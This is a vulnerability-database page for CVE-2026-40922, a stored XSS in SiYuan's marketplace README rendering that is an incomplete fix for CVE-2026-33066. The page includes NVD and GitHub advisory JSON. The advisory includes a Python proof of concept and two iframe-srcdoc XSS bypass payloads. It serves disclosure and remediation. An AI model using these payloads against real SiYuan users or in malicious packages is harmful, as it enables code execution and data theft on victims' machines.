Vulnerability-Lookup

CVE-2026-40922 (GCVE-0-2026-40922)

Vulnerability from cvelistv5 – Published: 2026-04-16 23:14 – Updated: 2026-04-16 23:14

Title

SiYuan: Incomplete sanitization of bazaar README allows stored XSS via iframe srcdoc (incomplete fix for CVE-2026-33066)

Summary

SiYuan is an open-source personal knowledge management system. In versions 3.6.1 through 3.6.3, a prior fix for XSS in bazaar README rendering (incomplete fix for CVE-2026-33066) enabled the Lute HTML sanitizer, but the sanitizer does not block iframe tags, and its URL-prefix blocklist does not effectively filter srcdoc attributes which contain raw HTML rather than URLs. A malicious bazaar package author can include an iframe with a srcdoc attribute containing embedded scripts in their README. When other users view the package in SiYuan's marketplace UI, the payload executes in the Electron context with full application privileges, enabling arbitrary code execution on the user's machine. This issue has been fixed in version 3.6.4.

Severity ?

5.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/siyuan-note/siyuan/security/ad…	x_refsource_CONFIRM
	https://github.com/siyuan-note/siyuan/commit/b382…	x_refsource_MISC
	https://github.com/advisories/GHSA-4663-4mpg-879v	x_refsource_MISC
	https://github.com/siyuan-note/siyuan/releases/ta…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.6.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is an open-source personal knowledge management system. In versions 3.6.1 through 3.6.3, a prior fix for XSS in bazaar README rendering (incomplete fix for CVE-2026-33066) enabled the Lute HTML sanitizer, but the sanitizer does not block iframe tags, and its URL-prefix blocklist does not effectively filter srcdoc attributes which contain raw HTML rather than URLs. A malicious bazaar package author can include an iframe with a srcdoc attribute containing embedded scripts in their README. When other users view the package in SiYuan\u0027s marketplace UI, the payload executes in the Electron context with full application privileges, enabling arbitrary code execution on the user\u0027s machine. This issue has been fixed in version 3.6.4."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-16T23:14:00.592Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
        },
        {
          "name": "https://github.com/advisories/GHSA-4663-4mpg-879v",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/advisories/GHSA-4663-4mpg-879v"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4"
        }
      ],
      "source": {
        "advisory": "GHSA-8q5w-mmxf-48jg",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan: Incomplete sanitization of bazaar README allows stored XSS via iframe srcdoc (incomplete fix for CVE-2026-33066)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40922",
    "datePublished": "2026-04-16T23:14:00.592Z",
    "dateReserved": "2026-04-15T20:40:15.517Z",
    "dateUpdated": "2026-04-16T23:14:00.592Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40922\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-17T01:17:40.447\",\"lastModified\":\"2026-04-17T01:17:40.447\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is an open-source personal knowledge management system. In versions 3.6.1 through 3.6.3, a prior fix for XSS in bazaar README rendering (incomplete fix for CVE-2026-33066) enabled the Lute HTML sanitizer, but the sanitizer does not block iframe tags, and its URL-prefix blocklist does not effectively filter srcdoc attributes which contain raw HTML rather than URLs. A malicious bazaar package author can include an iframe with a srcdoc attribute containing embedded scripts in their README. When other users view the package in SiYuan\u0027s marketplace UI, the payload executes in the Electron context with full application privileges, enabling arbitrary code execution on the user\u0027s machine. This issue has been fixed in version 3.6.4.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/advisories/GHSA-4663-4mpg-879v\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-40922

Vulnerability from fkie_nvd - Published: 2026-04-17 01:17 - Updated: 2026-04-17 01:17

Severity ?

5.3 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/advisories/GHSA-4663-4mpg-879v
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is an open-source personal knowledge management system. In versions 3.6.1 through 3.6.3, a prior fix for XSS in bazaar README rendering (incomplete fix for CVE-2026-33066) enabled the Lute HTML sanitizer, but the sanitizer does not block iframe tags, and its URL-prefix blocklist does not effectively filter srcdoc attributes which contain raw HTML rather than URLs. A malicious bazaar package author can include an iframe with a srcdoc attribute containing embedded scripts in their README. When other users view the package in SiYuan\u0027s marketplace UI, the payload executes in the Electron context with full application privileges, enabling arbitrary code execution on the user\u0027s machine. This issue has been fixed in version 3.6.4."
    }
  ],
  "id": "CVE-2026-40922",
  "lastModified": "2026-04-17T01:17:40.447",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-17T01:17:40.447",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/advisories/GHSA-4663-4mpg-879v"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-8Q5W-MMXF-48JG

Vulnerability from github – Published: 2026-04-14 23:12 – Updated: 2026-04-14 23:12

Summary

SiYuan has incomplete fix for CVE-2026-33066: XSS

Details

Summary

The incomplete fix for SiYuan's bazaar README rendering enables the Lute HTML sanitizer but fails to block <iframe> tags, allowing stored XSS via srcdoc attributes containing embedded scripts that execute in the Electron context.

Affected Package

Ecosystem: Go
Package: github.com/siyuan-note/siyuan
Affected versions: < commit b382f50e1880
Patched versions: >= commit b382f50e1880

Details

The renderPackageREADME() function in kernel/bazaar/readme.go renders Markdown README content from bazaar (marketplace) packages into HTML. The original vulnerability allowed stored XSS through unsanitized HTML in READMEs. The fix adds luteEngine.SetSanitize(true) to enable Lute's built-in HTML sanitizer.

However, the Lute sanitizer in lute/render/sanitizer.go has a critical gap: 1. <iframe> is explicitly commented out of setOfElementsToSkipContent, so iframe tags pass through. 2. The srcdoc attribute is checked against URL-prefix blocklists (javascript:, data:text/html), but srcdoc contains raw HTML content, not a URL. A value like <img src=x onerror=alert(1)> does not start with any blocked prefix. 3. The browser renders srcdoc HTML in a nested browsing context, executing embedded scripts and event handlers.

The fix correctly blocks direct <script> tags, event handler attributes, and javascript: protocol links. However:

<iframe srcdoc="<script>alert(document.domain)</script>"> passes through because iframe is not blocked and the srcdoc value is raw HTML (not a URL scheme).
<iframe srcdoc="<img src=x onerror=alert(document.cookie)>"> also passes because the event handler is inside the srcdoc string value, not a top-level tag attribute.

PoC

"""
CVE-2026-33066 - Incomplete Sanitization in SiYuan Bazaar README Rendering

Component: kernel/bazaar/readme.go :: renderPackageREADME()
Patch: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428
"""

import re
import sys
from html.parser import HTMLParser

ELEMENTS_TO_SKIP_CONTENT = {
    "frame", "frameset",
    # "iframe",  # NOTE: iframe is commented out in the original Go code!
    "noembed", "noframes", "noscript", "nostyle",
    "object", "script", "style", "title",
}

EVENT_ATTRS = {
    "onafterprint", "onbeforeprint", "onbeforeunload", "onerror",
    "onhashchange", "onload", "onmessage", "onoffline", "ononline",
    "onpagehide", "onpageshow", "onpopstate", "onresize", "onstorage",
    "onunload", "onblur", "onchange", "oncontextmenu", "onfocus",
    "oninput", "oninvalid", "onreset", "onsearch", "onselect",
    "onsubmit", "onkeydown", "onkeypress", "onkeyup", "onclick",
    "ondblclick", "onmousedown", "onmousemove", "onmouseout",
    "onmouseover", "onmouseleave", "onmouseenter", "onmouseup",
    "onmousewheel", "onwheel", "ondrag", "ondragend", "ondragenter",
    "ondragleave", "ondragover", "ondragstart", "ondrop", "onscroll",
    "oncopy", "oncut", "onpaste", "onabort", "oncanplay",
    "oncanplaythrough", "oncuechange", "ondurationchange", "onemptied",
    "onended", "onloadeddata", "onloadedmetadata", "onloadstart",
    "onpause", "onplay", "onplaying", "onprogress", "onratechange",
    "onseeked", "onseeking", "onstalled", "onsuspend", "ontimeupdate",
    "onvolumechange", "onwaiting", "ontoggle", "onbegin", "onend",
    "onrepeat", "http-equiv", "formaction",
}

URL_ATTRS = {"src", "srcdoc", "srcset", "href"}
BLOCKED_URL_PREFIXES = ("data:image/svg+xml", "data:text/html", "javascript")
SELF_CLOSING_TAGS = {"img", "br", "hr", "input", "meta", "link", "area",
                      "base", "col", "embed", "source", "track", "wbr"}


def sanitize_attr_value_for_url(key, val):
    cleaned = val.lower().strip()
    cleaned = ''.join(c for c in cleaned if not c.isspace() or c == ' ')
    for prefix in BLOCKED_URL_PREFIXES:
        if cleaned.startswith(prefix):
            return False
    return True


class LuteSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.output = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in ELEMENTS_TO_SKIP_CONTENT:
            self.skip_depth += 1
            self.output.append(" ")
            return
        if self.skip_depth > 0:
            return
        sanitized_attrs = []
        for key, val in attrs:
            key = key.lower()
            if val is None: val = ""
            if key in EVENT_ATTRS: continue
            if key in URL_ATTRS:
                if not sanitize_attr_value_for_url(key, val): continue
            sanitized_attrs.append((key, val))
        parts = ["<" + tag]
        for key, val in sanitized_attrs:
            escaped_val = val.replace("&", "&amp;").replace('"', "&quot;")
            parts.append(f' {key}="{escaped_val}"')
        if tag in SELF_CLOSING_TAGS: parts.append(" /")
        parts.append(">")
        self.output.append("".join(parts))

    def handle_endtag(self, tag):
        tag = tag.lower()
        if tag in ELEMENTS_TO_SKIP_CONTENT:
            self.skip_depth -= 1
            if self.skip_depth < 0: self.skip_depth = 0
            self.output.append(" ")
            return
        if self.skip_depth > 0: return
        self.output.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth > 0: return
        self.output.append(data)

    def handle_entityref(self, name):
        if self.skip_depth > 0: return
        self.output.append(f"&{name};")

    def handle_charref(self, name):
        if self.skip_depth > 0: return
        self.output.append(f"&#{name};")

    def handle_comment(self, data): pass
    def handle_decl(self, decl): pass

    def get_output(self): return "".join(self.output)


def sanitize_html(html_str):
    sanitizer = LuteSanitizer()
    sanitizer.feed(html_str)
    return sanitizer.get_output()


def check_xss(html_output):
    findings = []
    srcdoc_match = re.search(r'srcdoc="([^"]*)"', html_output, re.IGNORECASE)
    if srcdoc_match:
        import html as html_mod
        decoded = html_mod.unescape(srcdoc_match.group(1).lower())
        if '<script' in decoded:
            findings.append("iframe srcdoc: embedded <script> tag")
        if re.search(r'on\w+\s*=', decoded):
            findings.append("iframe srcdoc: event handler in nested HTML")
    return findings


PAYLOADS = [
    '<iframe srcdoc="<script>alert(document.domain)</script>"></iframe>',
    '<iframe srcdoc="<img src=x onerror=alert(document.cookie)>"></iframe>',
]

bypass_found = False
for payload in PAYLOADS:
    fixed_output = sanitize_html(payload)
    findings = check_xss(fixed_output)
    if findings:
        bypass_found = True
        print(f"BYPASS: {payload[:80]}")
        for f in findings:
            print(f"  - {f}")

if bypass_found:
    print("\nVULNERABILITY CONFIRMED")
    sys.exit(0)
else:
    print("\nVULNERABILITY NOT CONFIRMED")
    sys.exit(1)

python3 poc.py

Steps to reproduce: 1. git clone https://github.com/siyuan-note/siyuan /tmp/siyuan_test 2. cd /tmp/siyuan_test && git checkout b382f50e1880ed996364509de5a10a72d7409428~1 3. python3 poc.py (or go run poc.go if Go PoC)

Expected output:

VULNERABILITY CONFIRMED
Iframe tags with srcdoc attributes bypass the Lute sanitizer, allowing embedded scripts to execute in the Electron context.

Impact

A malicious bazaar package author can include <iframe srcdoc='<script>...</script>'> in their README.md. When other users view the package in SiYuan's marketplace UI, the XSS executes in the Electron context with full application privileges, enabling data theft, local file access, and arbitrary code execution on the user's machine.

Suggested Remediation

Add iframe to the setOfElementsToSkipContent set in the Lute sanitizer.
If iframes must be preserved, strip the srcdoc attribute entirely or sanitize its HTML content recursively.
Apply a Content Security Policy (CSP) to the README rendering context.

References

Incomplete fix commit: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428
Original CVE: CVE-2026-33066

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260414013942-62eed37a3263"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:12:18Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe incomplete fix for SiYuan\u0027s bazaar README rendering enables the Lute HTML sanitizer but fails to block `\u003ciframe\u003e` tags, allowing stored XSS via `srcdoc` attributes containing embedded scripts that execute in the Electron context.\n\n### Affected Package\n\n- **Ecosystem:** Go\n- **Package:** github.com/siyuan-note/siyuan\n- **Affected versions:** \u003c commit b382f50e1880\n- **Patched versions:** \u003e= commit b382f50e1880\n\n### Details\n\nThe `renderPackageREADME()` function in `kernel/bazaar/readme.go` renders Markdown README content from bazaar (marketplace) packages into HTML. The original vulnerability allowed stored XSS through unsanitized HTML in READMEs. The fix adds `luteEngine.SetSanitize(true)` to enable Lute\u0027s built-in HTML sanitizer.\n\nHowever, the Lute sanitizer in `lute/render/sanitizer.go` has a critical gap:\n1. `\u003ciframe\u003e` is explicitly commented out of `setOfElementsToSkipContent`, so iframe tags pass through.\n2. The `srcdoc` attribute is checked against URL-prefix blocklists (`javascript:`, `data:text/html`), but `srcdoc` contains raw HTML content, not a URL. A value like `\u003cimg src=x onerror=alert(1)\u003e` does not start with any blocked prefix.\n3. The browser renders `srcdoc` HTML in a nested browsing context, executing embedded scripts and event handlers.\n\nThe fix correctly blocks direct `\u003cscript\u003e` tags, event handler attributes, and `javascript:` protocol links. However:\n\n- `\u003ciframe srcdoc=\"\u003cscript\u003ealert(document.domain)\u003c/script\u003e\"\u003e` passes through because iframe is not blocked and the srcdoc value is raw HTML (not a URL scheme).\n- `\u003ciframe srcdoc=\"\u003cimg src=x onerror=alert(document.cookie)\u003e\"\u003e` also passes because the event handler is inside the srcdoc string value, not a top-level tag attribute.\n\n### PoC\n\n```python\n\"\"\"\nCVE-2026-33066 - Incomplete Sanitization in SiYuan Bazaar README Rendering\n\nComponent: kernel/bazaar/readme.go :: renderPackageREADME()\nPatch: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\n\"\"\"\n\nimport re\nimport sys\nfrom html.parser import HTMLParser\n\nELEMENTS_TO_SKIP_CONTENT = {\n    \"frame\", \"frameset\",\n    # \"iframe\",  # NOTE: iframe is commented out in the original Go code!\n    \"noembed\", \"noframes\", \"noscript\", \"nostyle\",\n    \"object\", \"script\", \"style\", \"title\",\n}\n\nEVENT_ATTRS = {\n    \"onafterprint\", \"onbeforeprint\", \"onbeforeunload\", \"onerror\",\n    \"onhashchange\", \"onload\", \"onmessage\", \"onoffline\", \"ononline\",\n    \"onpagehide\", \"onpageshow\", \"onpopstate\", \"onresize\", \"onstorage\",\n    \"onunload\", \"onblur\", \"onchange\", \"oncontextmenu\", \"onfocus\",\n    \"oninput\", \"oninvalid\", \"onreset\", \"onsearch\", \"onselect\",\n    \"onsubmit\", \"onkeydown\", \"onkeypress\", \"onkeyup\", \"onclick\",\n    \"ondblclick\", \"onmousedown\", \"onmousemove\", \"onmouseout\",\n    \"onmouseover\", \"onmouseleave\", \"onmouseenter\", \"onmouseup\",\n    \"onmousewheel\", \"onwheel\", \"ondrag\", \"ondragend\", \"ondragenter\",\n    \"ondragleave\", \"ondragover\", \"ondragstart\", \"ondrop\", \"onscroll\",\n    \"oncopy\", \"oncut\", \"onpaste\", \"onabort\", \"oncanplay\",\n    \"oncanplaythrough\", \"oncuechange\", \"ondurationchange\", \"onemptied\",\n    \"onended\", \"onloadeddata\", \"onloadedmetadata\", \"onloadstart\",\n    \"onpause\", \"onplay\", \"onplaying\", \"onprogress\", \"onratechange\",\n    \"onseeked\", \"onseeking\", \"onstalled\", \"onsuspend\", \"ontimeupdate\",\n    \"onvolumechange\", \"onwaiting\", \"ontoggle\", \"onbegin\", \"onend\",\n    \"onrepeat\", \"http-equiv\", \"formaction\",\n}\n\nURL_ATTRS = {\"src\", \"srcdoc\", \"srcset\", \"href\"}\nBLOCKED_URL_PREFIXES = (\"data:image/svg+xml\", \"data:text/html\", \"javascript\")\nSELF_CLOSING_TAGS = {\"img\", \"br\", \"hr\", \"input\", \"meta\", \"link\", \"area\",\n                      \"base\", \"col\", \"embed\", \"source\", \"track\", \"wbr\"}\n\n\ndef sanitize_attr_value_for_url(key, val):\n    cleaned = val.lower().strip()\n    cleaned = \u0027\u0027.join(c for c in cleaned if not c.isspace() or c == \u0027 \u0027)\n    for prefix in BLOCKED_URL_PREFIXES:\n        if cleaned.startswith(prefix):\n            return False\n    return True\n\n\nclass LuteSanitizer(HTMLParser):\n    def __init__(self):\n        super().__init__(convert_charrefs=False)\n        self.output = []\n        self.skip_depth = 0\n\n    def handle_starttag(self, tag, attrs):\n        tag = tag.lower()\n        if tag in ELEMENTS_TO_SKIP_CONTENT:\n            self.skip_depth += 1\n            self.output.append(\" \")\n            return\n        if self.skip_depth \u003e 0:\n            return\n        sanitized_attrs = []\n        for key, val in attrs:\n            key = key.lower()\n            if val is None: val = \"\"\n            if key in EVENT_ATTRS: continue\n            if key in URL_ATTRS:\n                if not sanitize_attr_value_for_url(key, val): continue\n            sanitized_attrs.append((key, val))\n        parts = [\"\u003c\" + tag]\n        for key, val in sanitized_attrs:\n            escaped_val = val.replace(\"\u0026\", \"\u0026amp;\").replace(\u0027\"\u0027, \"\u0026quot;\")\n            parts.append(f\u0027 {key}=\"{escaped_val}\"\u0027)\n        if tag in SELF_CLOSING_TAGS: parts.append(\" /\")\n        parts.append(\"\u003e\")\n        self.output.append(\"\".join(parts))\n\n    def handle_endtag(self, tag):\n        tag = tag.lower()\n        if tag in ELEMENTS_TO_SKIP_CONTENT:\n            self.skip_depth -= 1\n            if self.skip_depth \u003c 0: self.skip_depth = 0\n            self.output.append(\" \")\n            return\n        if self.skip_depth \u003e 0: return\n        self.output.append(f\"\u003c/{tag}\u003e\")\n\n    def handle_data(self, data):\n        if self.skip_depth \u003e 0: return\n        self.output.append(data)\n\n    def handle_entityref(self, name):\n        if self.skip_depth \u003e 0: return\n        self.output.append(f\"\u0026{name};\")\n\n    def handle_charref(self, name):\n        if self.skip_depth \u003e 0: return\n        self.output.append(f\"\u0026#{name};\")\n\n    def handle_comment(self, data): pass\n    def handle_decl(self, decl): pass\n\n    def get_output(self): return \"\".join(self.output)\n\n\ndef sanitize_html(html_str):\n    sanitizer = LuteSanitizer()\n    sanitizer.feed(html_str)\n    return sanitizer.get_output()\n\n\ndef check_xss(html_output):\n    findings = []\n    srcdoc_match = re.search(r\u0027srcdoc=\"([^\"]*)\"\u0027, html_output, re.IGNORECASE)\n    if srcdoc_match:\n        import html as html_mod\n        decoded = html_mod.unescape(srcdoc_match.group(1).lower())\n        if \u0027\u003cscript\u0027 in decoded:\n            findings.append(\"iframe srcdoc: embedded \u003cscript\u003e tag\")\n        if re.search(r\u0027on\\w+\\s*=\u0027, decoded):\n            findings.append(\"iframe srcdoc: event handler in nested HTML\")\n    return findings\n\n\nPAYLOADS = [\n    \u0027\u003ciframe srcdoc=\"\u003cscript\u003ealert(document.domain)\u003c/script\u003e\"\u003e\u003c/iframe\u003e\u0027,\n    \u0027\u003ciframe srcdoc=\"\u003cimg src=x onerror=alert(document.cookie)\u003e\"\u003e\u003c/iframe\u003e\u0027,\n]\n\nbypass_found = False\nfor payload in PAYLOADS:\n    fixed_output = sanitize_html(payload)\n    findings = check_xss(fixed_output)\n    if findings:\n        bypass_found = True\n        print(f\"BYPASS: {payload[:80]}\")\n        for f in findings:\n            print(f\"  - {f}\")\n\nif bypass_found:\n    print(\"\\nVULNERABILITY CONFIRMED\")\n    sys.exit(0)\nelse:\n    print(\"\\nVULNERABILITY NOT CONFIRMED\")\n    sys.exit(1)\n```\n\n```bash\npython3 poc.py\n```\n\n**Steps to reproduce:**\n1. `git clone https://github.com/siyuan-note/siyuan /tmp/siyuan_test`\n2. `cd /tmp/siyuan_test \u0026\u0026 git checkout b382f50e1880ed996364509de5a10a72d7409428~1`\n3. `python3 poc.py`  (or `go run poc.go` if Go PoC)\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\nIframe tags with srcdoc attributes bypass the Lute sanitizer, allowing embedded scripts to execute in the Electron context.\n```\n\n### Impact\n\nA malicious bazaar package author can include `\u003ciframe srcdoc=\u0027\u003cscript\u003e...\u003c/script\u003e\u0027\u003e` in their README.md. When other users view the package in SiYuan\u0027s marketplace UI, the XSS executes in the Electron context with full application privileges, enabling data theft, local file access, and arbitrary code execution on the user\u0027s machine.\n\n### Suggested Remediation\n\n1. Add `iframe` to the `setOfElementsToSkipContent` set in the Lute sanitizer.\n2. If iframes must be preserved, strip the `srcdoc` attribute entirely or sanitize its HTML content recursively.\n3. Apply a Content Security Policy (CSP) to the README rendering context.\n\n### References\n\n- Incomplete fix commit: https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428\n- Original CVE: CVE-2026-33066",
  "id": "GHSA-8q5w-mmxf-48jg",
  "modified": "2026-04-14T23:12:19Z",
  "published": "2026-04-14T23:12:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8q5w-mmxf-48jg"
    },
    {
      "type": "ADVISORY",
